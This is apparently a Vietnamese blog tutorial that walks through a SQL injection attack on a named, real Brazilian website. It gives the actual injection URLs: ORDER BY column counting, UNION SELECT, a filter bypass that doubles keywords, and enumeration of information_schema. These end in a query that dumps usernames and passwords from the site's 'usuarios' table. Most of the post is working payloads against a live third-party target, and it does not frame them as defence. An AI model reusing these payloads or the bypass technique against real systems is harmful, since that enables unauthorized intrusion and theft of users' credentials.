Phần đầu mình lấy của Judon trong vhb
Phần 1
Báo
lỗi
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near ''' at line 3
Thực hiện lệnh order by tìm cột lỗi
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131
order by 9-- // ko lỗi nhé
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131
order by 10-- // báo lỗi Unknown
column '10' in 'order clause'
=>> có 10
cột từ 0-9
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null
union select 1,2,3,4,5,6,7,8,9-- //
báo lỗi Comando SQL:
SELECT * FROM artigos WHERE id = null union
1,2,3,4,5,6,7,8,9
không thấy chữ select đâu,dự
là bị thịt mất rồi,nên ta thay bằng câu lệnh sau :
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null
union selselectect 1,2,3,4,5,6,7,8,9--
( thay select= selsellectect,seselectlect…,khi chữ select bị tô đậm bị
thịt mất,thì vẫn còn 1 chữ select )
Cau lệnh đúng =>> có 3 cột lỗi là 4,5,7
Tìm table :
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130
UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 from
information_schema.tables where table_schema=database()—
// lại bị thịt mất từ FROM và
WHERE
Nhưng k sao,vẫn áp dụng cách trên ta có :
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null
UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 frfromom information_schema.tables whwhereere table_schema=database()—
Xuất hiện 1
đống các table
artigos,artigos_categoria,artigos_comentario,carta_dia,contato,depoimentos,duvidas,indique,links,links_categoria,usuarios
usuarios chắc là bảng user đây
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null
UNION selSELECTect 1,2,3,group_concat(column_name),5,6,7,8,9 frfromom
information_schema.columns whwhereere table_name=0x7573756172696f73—
id,nome,email,login,senha,tipo
nome là name,còn senha là pass :
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null
UNION selSELECTect 1,2,3,group_concat(nome,0x3a,senha),5,6,7,8,9 frfromom
usuarios—
Không có nhận xét nào:
Đăng nhận xét